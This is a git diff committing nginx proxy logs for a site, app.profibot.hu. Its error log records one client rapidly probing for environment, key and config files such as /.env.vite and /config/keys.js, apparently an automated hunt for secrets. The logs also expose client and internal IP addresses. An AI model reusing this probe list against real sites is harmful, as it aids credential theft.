Safari/537.36" "-" +[29/Jan/2026:13:51:56 +0000] - 200 200 - GET http app.profibot.hu "/api/v2/openapi.json" [Client 84.1.26.27] [Length 8722] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "http://app.profibot.hu/docs" +[29/Jan/2026:13:58:15 +0000] - 200 200 - GET http app.profibot.hu "/docs" [Client 84.1.26.27] [Length 517] [Gzip 1.90] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:13:58:15 +0000] - 200 200 - GET http app.profibot.hu "/api/v2/openapi.json" [Client 84.1.26.27] [Length 9062] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "http://app.profibot.hu/docs" +[29/Jan/2026:14:13:18 +0000] - 200 200 - GET http app.profibot.hu "/docs" [Client 84.1.26.27] [Length 517] [Gzip 1.90] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:14:13:18 +0000] - 200 200 - GET http app.profibot.hu "/api/v2/openapi.json" [Client 84.1.26.27] [Length 9062] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "http://app.profibot.hu/docs" +[30/Jan/2026:01:08:33 +0000] - 404 404 - GET https app.profibot.hu "/robots.txt" [Client 74.7.175.153] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[30/Jan/2026:13:15:31 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 43.228.125.75] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[30/Jan/2026:13:40:51 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 84.1.26.27] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[30/Jan/2026:13:40:52 +0000] - 404 404 - GET https app.profibot.hu "/favicon.ico" [Client 84.1.26.27] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://app.profibot.hu/" +[31/Jan/2026:04:19:33 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 149.57.180.11] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0" "-" +[31/Jan/2026:10:06:50 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 37.76.43.179] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:06:51 +0000] - 404 404 - GET https app.profibot.hu "/favicon.ico" [Client 37.76.43.179] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[31/Jan/2026:10:06:53 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 66.249.81.224] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[31/Jan/2026:10:06:53 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 66.102.9.205] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[31/Jan/2026:10:06:53 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 66.249.83.128] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[31/Jan/2026:10:07:30 +0000] - 502 502 - GET https app.profibot.hu "/" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:07:31 +0000] - 502 502 - GET https app.profibot.hu "/" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:22:36 +0000] - 502 502 - GET https app.profibot.hu "/" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:22:37 +0000] - 502 502 - GET https app.profibot.hu "/" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:22:37 +0000] - 502 502 - GET https app.profibot.hu "/favicon.ico" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[31/Jan/2026:10:27:37 +0000] - 502 502 - GET https app.profibot.hu "/" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to service_finder_frontend] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:27:37 +0000] - 502 502 - GET https app.profibot.hu "/favicon.ico" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to service_finder_frontend] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[31/Jan/2026:10:27:39 +0000] - 502 502 - GET https app.profibot.hu "/" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to service_finder_frontend] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:27:39 +0000] - 502 502 - GET https app.profibot.hu "/favicon.ico" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to service_finder_frontend] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[31/Jan/2026:10:28:35 +0000] - 502 502 - GET https app.profibot.hu "/" [Client 37.76.43.179] [Length 556] [Gzip -] [Sent-to service_finder_frontend] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:28:37 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 37.76.43.179] [Length 307] [Gzip 1.54] [Sent-to service_finder_frontend] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:10:28:37 +0000] - 200 200 - GET https app.profibot.hu "/assets/index-DlnPilgI.css" [Client 37.76.43.179] [Length 21288] [Gzip -] [Sent-to service_finder_frontend] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[31/Jan/2026:10:28:37 +0000] - 200 200 - GET https app.profibot.hu "/assets/index-BSFHQ8KO.js" [Client 37.76.43.179] [Length 145832] [Gzip -] [Sent-to service_finder_frontend] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[31/Jan/2026:10:28:37 +0000] - 200 200 - GET https app.profibot.hu "/vite.svg" [Client 37.76.43.179] [Length 1497] [Gzip -] [Sent-to service_finder_frontend] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[31/Jan/2026:20:12:30 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 37.187.134.41] [Length 307] [Gzip 1.54] [Sent-to service_finder_frontend] "Mozilla/5.0 (compatible; OpenEASM/1.0)" "-" +[02/Feb/2026:04:39:21 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 167.172.29.13] [Length 307] [Gzip 1.54] [Sent-to service_finder_frontend] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[02/Feb/2026:08:11:55 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 159.89.185.14] [Length 307] [Gzip 1.54] [Sent-to service_finder_frontend] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[02/Feb/2026:10:04:29 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 45.55.236.91] [Length 307] [Gzip 1.54] [Sent-to service_finder_frontend] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" "-" +[02/Feb/2026:19:24:43 +0000] - 304 304 - GET https app.profibot.hu "/" [Client 37.76.18.194] [Length 0] [Gzip -] [Sent-to service_finder_frontend] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[02/Feb/2026:19:24:44 +0000] - 304 304 - GET https app.profibot.hu "/assets/index-DlnPilgI.css" [Client 37.76.18.194] [Length 0] [Gzip -] [Sent-to service_finder_frontend] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[02/Feb/2026:19:24:44 +0000] - 304 304 - GET https app.profibot.hu "/assets/index-BSFHQ8KO.js" [Client 37.76.18.194] [Length 0] [Gzip -] [Sent-to service_finder_frontend] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://app.profibot.hu/" +[02/Feb/2026:19:25:35 +0000] - 200 200 - GET https app.profibot.hu "/" [Client 178.164.141.189] [Length 307] [Gzip 1.54] [Sent-to service_finder_frontend] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[02/Feb/2026:19:25:35 +0000] - 200 200 - GET https app.profibot.hu "/assets/index-BSFHQ8KO.js" [Client 178.164.141.189] [Length 145832] [Gzip -] [Sent-to service_finder_frontend] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://app.profibot.hu/" +[02/Feb/2026:19:25:35 +0000] - 200 200 - GET https app.profibot.hu "/assets/index-DlnPilgI.css" [Client 178.164.141.189] [Length 21288] [Gzip -] [Sent-to service_finder_frontend] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://app.profibot.hu/" +[02/Feb/2026:19:25:35 +0000] - 200 200 - GET https app.profibot.hu "/vite.svg" [Client 178.164.141.189] [Length 1497] [Gzip -] [Sent-to service_finder_frontend] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://app.profibot.hu/login" diff --git a/proxy-manager/data/logs/proxy-host-9_error.log b/proxy-manager/data/logs/proxy-host-9_error.log new file mode 100755 index 0000000..b6875a9 --- /dev/null +++ b/proxy-manager/data/logs/proxy-host-9_error.log @@ -0,0 +1,279 @@ +2026/01/20 19:16:44 [warn] 252#252: *4093 using uninitialized "server" variable while logging request, client: 185.253.160.139, server: app.profibot.hu, request: "GET / HTTP/1.1", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6376 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /src/env.d.ts HTTP/1.1", upstream: "http://192.168.100.43:8000/src/env.d.ts", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6383 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /vite.config.ts HTTP/1.1", upstream: "http://192.168.100.43:8000/vite.config.ts", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6396 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /app/root.tsx HTTP/1.1", upstream: "http://192.168.100.43:8000/app/root.tsx", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6331 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /vendor.js HTTP/1.1", upstream: "http://192.168.100.43:8000/vendor.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6399 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /_astro/page.js HTTP/1.1", upstream: "http://192.168.100.43:8000/_astro/page.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 251#251: *6340 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /config/env.js HTTP/1.1", upstream: "http://192.168.100.43:8000/config/env.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 251#251: *6415 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /static/js/3.chunk.js HTTP/1.1", upstream: "http://192.168.100.43:8000/static/js/3.chunk.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6329 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /js/app.js HTTP/1.1", upstream: "http://192.168.100.43:8000/js/app.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6404 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /src/env.d.ts HTTP/1.1", upstream: "http://192.168.100.43:8000/src/env.d.ts", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6333 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /app.js.map HTTP/1.1", upstream: "http://192.168.100.43:8000/app.js.map", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6390 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /_app/env.js HTTP/1.1", upstream: "http://192.168.100.43:8000/_app/env.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6386 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /@vite/env HTTP/1.1", upstream: "http://192.168.100.43:8000/@vite/env", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6392 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /vite.config.js HTTP/1.1", upstream: "http://192.168.100.43:8000/vite.config.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6395 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /.svelte-kit/output/client/_app/env.js HTTP/1.1", upstream: "http://192.168.100.43:8000/.svelte-kit/output/client/_app/env.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6385 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /__config.js HTTP/1.1", upstream: "http://192.168.100.43:8000/__config.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6425 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /_next/static/chunks/commons.js HTTP/1.1", upstream: "http://192.168.100.43:8000/_next/static/chunks/commons.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6421 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /assets/main.js HTTP/1.1", upstream: "http://192.168.100.43:8000/assets/main.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 251#251: *6375 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /api/settings HTTP/1.1", upstream: "http://192.168.100.43:8000/api/settings", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 253#253: *6325 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /static/js/app.js HTTP/1.1", upstream: "http://192.168.100.43:8000/static/js/app.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 251#251: *6341 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /_nuxt/vendors.app.js HTTP/1.1", upstream: "http://192.168.100.43:8000/_nuxt/vendors.app.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 251#251: *6303 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /settings.js HTTP/1.1", upstream: "http://192.168.100.43:8000/settings.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6405 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /build/qwik-loader.js HTTP/1.1", upstream: "http://192.168.100.43:8000/build/qwik-loader.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 253#253: *6339 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /_next/static/chunks/pages/index.js HTTP/1.1", upstream: "http://192.168.100.43:8000/_next/static/chunks/pages/index.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6406 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /.env.vite HTTP/1.1", upstream: "http://192.168.100.43:8000/.env.vite", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 251#251: *6419 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /static/js/4.chunk.js HTTP/1.1", upstream: "http://192.168.100.43:8000/static/js/4.chunk.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6400 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /_astro/hoisted.js HTTP/1.1", upstream: "http://192.168.100.43:8000/_astro/hoisted.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6408 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /page-data/app-data.json HTTP/1.1", upstream: "http://192.168.100.43:8000/page-data/app-data.json", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 253#253: *6351 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /config/keys.js HTTP/1.1", upstream: "http://192.168.100.43:8000/config/keys.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 253#253: *6411 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /build/index.js HTTP/1.1", upstream: "http://192.168.100.43:8000/build/index.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6409 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /bundle.js.map HTTP/1.1", upstream: "http://192.168.100.43:8000/bundle.js.map", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6353 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /runtime-config.js HTTP/1.1", upstream: "http://192.168.100.43:8000/runtime-config.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6337 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /main.js.map HTTP/1.1", upstream: "http://192.168.100.43:8000/main.js.map", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6343 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /src/env.js HTTP/1.1", upstream: "http://192.168.100.43:8000/src/env.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 253#253: *6330 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /_next/static/chunks/main.js HTTP/1.1", upstream: "http://192.168.100.43:8000/_next/static/chunks/main.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 253#253: *6328 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /vendor.js.map HTTP/1.1", upstream: "http://192.168.100.43:8000/vendor.js.map", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6369 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /subscribe HTTP/1.1", upstream: "http://192.168.100.43:8000/subscribe", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 251#251: *6317 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /dist/main.js HTTP/1.1", upstream: "http://192.168.100.43:8000/dist/main.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 251#251: *6367 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /__env.js HTTP/1.1", upstream: "http://192.168.100.43:8000/__env.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6354 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /config/index.js HTTP/1.1", upstream: "http://192.168.100.43:8000/config/index.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6355 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /lib/config.js HTTP/1.1", upstream: "http://192.168.100.43:8000/lib/config.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 251#251: *6320 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /public/js/app.js HTTP/1.1", upstream: "http://192.168.100.43:8000/public/js/app.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6373 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /api/config HTTP/1.1", upstream: "http://192.168.100.43:8000/api/config", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 253#253: *6334 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /js/main.js HTTP/1.1", upstream: "http://192.168.100.43:8000/js/main.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 253#253: *6398 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /app/entry.client.tsx HTTP/1.1", upstream: "http://192.168.100.43:8000/app/entry.client.tsx", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6357 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /settings.json HTTP/1.1", upstream: "http://192.168.100.43:8000/settings.json", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6360 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /donate HTTP/1.1", upstream: "http://192.168.100.43:8000/donate", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 251#251: *6372 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /checkout HTTP/1.1", upstream: "http://192.168.100.43:8000/checkout", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6327 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /static/js/main.js HTTP/1.1", upstream: "http://192.168.100.43:8000/static/js/main.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6363 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /env.json HTTP/1.1", upstream: "http://192.168.100.43:8000/env.json", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6432 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /build/q-manifest.json HTTP/1.1", upstream: "http://192.168.100.43:8000/build/q-manifest.json", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6429 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /_next/static/chunks/polyfills.js HTTP/1.1", upstream: "http://192.168.100.43:8000/_next/static/chunks/polyfills.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6308 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /stripe.js HTTP/1.1", upstream: "http://192.168.100.43:8000/stripe.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6427 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /serviceworker.js HTTP/1.1", upstream: "http://192.168.100.43:8000/serviceworker.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6433 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /webpack-runtime.js HTTP/1.1", upstream: "http://192.168.100.43:8000/webpack-runtime.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6323 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /public/js/bundle.js HTTP/1.1", upstream: "http://192.168.100.43:8000/public/js/bundle.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6380 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /_next/static/chunks/_buildManifest.js HTTP/1.1", upstream: "http://192.168.100.43:8000/_next/static/chunks/_buildManifest.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 250#250: *6436 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /dist/client.js HTTP/1.1", upstream: "http://192.168.100.43:8000/dist/client.js", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6381 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /api/config.json HTTP/1.1", upstream: "http://192.168.100.43:8000/api/config.json", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 251#251: *6384 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /.vite/manifest.json HTTP/1.1", upstream: "http://192.168.100.43:8000/.vite/manifest.json", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 251#251: *6379 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /.vite/deps/_metadata.json HTTP/1.1", upstream: "http://192.168.100.43:8000/.vite/deps/_metadata.json", host: "app.profibot.hu" +2026/01/20 22:02:39 [error] 252#252: *6388 connect() failed (111: Connection refused) while connecting to upstream, client: 34.27.62.169, server: app.profibot.hu, request: "GET /build/root.js HTTP/1.1", upstream: "http://192.168.100.43:8000/build/root.js", host: "app.profibot.hu" 